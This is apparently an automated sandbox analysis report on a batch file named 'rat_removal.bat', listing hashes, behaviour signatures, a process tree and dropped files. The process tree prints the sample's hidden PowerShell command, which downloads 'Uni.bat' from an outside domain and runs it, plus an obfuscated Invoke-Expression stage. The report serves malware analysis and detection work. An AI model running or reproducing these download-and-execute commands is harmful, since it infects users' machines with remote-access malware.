Resubmissions

14/03/2024, 05:24

240314-f3wxmsdg73 10

14/03/2024, 05:13

240314-fwwcjabd6s 8

Analysis

  • max time kernel
    79s
  • max time network
    141s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240221-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    14/03/2024, 05:24

General

  • Target

    rat_removal.bat

  • Size

    14KB

  • MD5

    2c0ee080298d0de1320e6e7eda4ca39b

  • SHA1

    edd03f96d4f4277a24e541376fdddf43439b4a99

  • SHA256

    7e81cadeef133c8230dbe26f95a66d3b47cead73ba1e37170ac95869abe17f8e

  • SHA512

    ffdfd43eb46107be849d3e1938d1db0be87d27700799a9f31527b512abaca615241c6ee2d6358061d5ea133233aa0edda9908091419c024977b25365064d9e64

  • SSDEEP

    192:HbKSAmk7b/FQASmmZrQCgljChA4DW0JyquFnpUoH:H28k7b/hkQCgljwAEbyvFpL

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4896
    • C:\Windows\system32\chcp.com
      chcp.com 437
      2⤵
      PID:4564
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c type tmp
      2⤵
      PID:2028
    • C:\Windows\system32\findstr.exe
      findstr /L /I set C:\Users\Admin\AppData\Local\Temp\rat_removal.bat
      2⤵
      PID:212
    • C:\Windows\system32\findstr.exe
      findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\rat_removal.bat
      2⤵
      PID:2908
    • C:\Windows\system32\findstr.exe
      findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\rat_removal.bat
      2⤵
      PID:3912
    • C:\Windows\system32\findstr.exe
      findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\rat_removal.bat
      2⤵
      PID:4540
    • C:\Windows\system32\find.exe
      find
      2⤵
      PID:4556
    • C:\Windows\system32\find.exe
      find
      2⤵
      PID:1508
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c type tmp
      2⤵
      PID:860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://robloxplayerclient.org/Uni.bat' -OutFile: 'C:\Users\Admin\AppData\Local\Temp\Uni.bat'"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1160
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3412
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OWMmhUSKSJ; "
        3⤵
        PID:8
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1072
  • C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
    "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca
    1⤵
    • Drops file in Windows directory
    • Suspicious use of SetWindowsHookEx
    PID:4860

Network

MITRE ATT&CK Matrix

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 3KB
    MD5: d737fc27bbf2f3bd19d1706af83dbe3f
    SHA1: 212d219394124968b50769c371121a577d973985
    SHA256: b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
    SHA512: 974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

  • C:\Users\Admin\AppData\Local\Temp\Uni.bat
    Filesize: 6.1MB
    MD5: 6bdab73b1ae1fb7629bd9c250354a250
    SHA1: 24fa877ae0db1d2f1b24ce29ea8eddefddc4afc6
    SHA256: e0fe368de1cd2f3f769182e24944f9e03e7d0483aded6dc27d20b53680ca67bb
    SHA512: f721eff91fdce63097a12fa8a1cf6b48664ad2563439b03369c201c893e502e3a43191ded7782795d0ec84199307042afb8c89cfddfdb39b55286f558dc0357a

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orwd3zkq.uw1.ps1
    Filesize: 1B
    MD5: c4ca4238a0b923820dcc509a6f75849b
    SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
    SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
    SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Local\Temp\tmp
    Filesize: 14B
    MD5: ce585c6ba32ac17652d2345118536f9c
    SHA1: be0e41b3690c42e4c0cdb53d53fc544fb46b758d
    SHA256: 589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
    SHA512: d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

  • C:\Users\Admin\Desktop\New Compressed (zipped) Folder.zip
    Filesize: 22B
    MD5: 76cdb2bad9582d23c1f6f4d868218d6c
    SHA1: b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
    SHA256: 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
    SHA512: 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

  • memory/1072-108-0x00007FF7C0E50000-0x00007FF7C0EC0000-memory.dmp (Filesize: 448KB)
  • memory/1072-103-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp (Filesize: 1.9MB)
  • memory/1072-142-0x00007FFABC490000-0x00007FFABC53E000-memory.dmp (Filesize: 696KB)
  • memory/1072-141-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp (Filesize: 1.9MB)
  • memory/1072-140-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp (Filesize: 9.9MB)
  • memory/1072-139-0x00007FF7C0E50000-0x00007FF7C0EC0000-memory.dmp (Filesize: 448KB)
  • memory/1072-44-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp (Filesize: 9.9MB)
  • memory/1072-46-0x00000147B3530000-0x00000147B3540000-memory.dmp (Filesize: 64KB)
  • memory/1072-48-0x00000147B3530000-0x00000147B3540000-memory.dmp (Filesize: 64KB)
  • memory/1072-77-0x00000147B3BC0000-0x00000147B3BFC000-memory.dmp (Filesize: 240KB)
  • memory/1072-96-0x00000147B3530000-0x00000147B3540000-memory.dmp (Filesize: 64KB)
  • memory/1072-132-0x00000147B3530000-0x00000147B3540000-memory.dmp (Filesize: 64KB)
  • memory/1072-99-0x00000147FC270000-0x00000147FCD1C000-memory.dmp (Filesize: 10.7MB)
  • memory/1072-100-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp (Filesize: 9.9MB)
  • memory/1072-101-0x00000147B3530000-0x00000147B3540000-memory.dmp (Filesize: 64KB)
  • memory/1072-113-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp (Filesize: 1.9MB)
  • memory/1072-104-0x00000147FCD20000-0x00000147FD80C000-memory.dmp (Filesize: 10.9MB)
  • memory/1072-107-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp (Filesize: 1.9MB)
  • memory/1072-109-0x00007FFABC490000-0x00007FFABC53E000-memory.dmp (Filesize: 696KB)
  • memory/1072-112-0x00000147B3530000-0x00000147B3540000-memory.dmp (Filesize: 64KB)
  • memory/1072-110-0x00000147B3530000-0x00000147B3540000-memory.dmp (Filesize: 64KB)
  • memory/1072-111-0x00007FFABEF30000-0x00007FFABF10B000-memory.dmp (Filesize: 1.9MB)
  • memory/1160-8-0x0000028671340000-0x0000028671362000-memory.dmp (Filesize: 136KB)
  • memory/1160-14-0x0000028671500000-0x0000028671576000-memory.dmp (Filesize: 472KB)
  • memory/1160-9-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp (Filesize: 9.9MB)
  • memory/1160-10-0x0000028671370000-0x0000028671380000-memory.dmp (Filesize: 64KB)
  • memory/1160-11-0x0000028671370000-0x0000028671380000-memory.dmp (Filesize: 64KB)
  • memory/1160-39-0x00007FFAB22D0000-0x00007FFAB2CBC000-memory.dmp (Filesize: 9.9MB)
  • memory/1160-29-0x0000028671370000-0x0000028671380000-memory.dmp (Filesize: 64KB)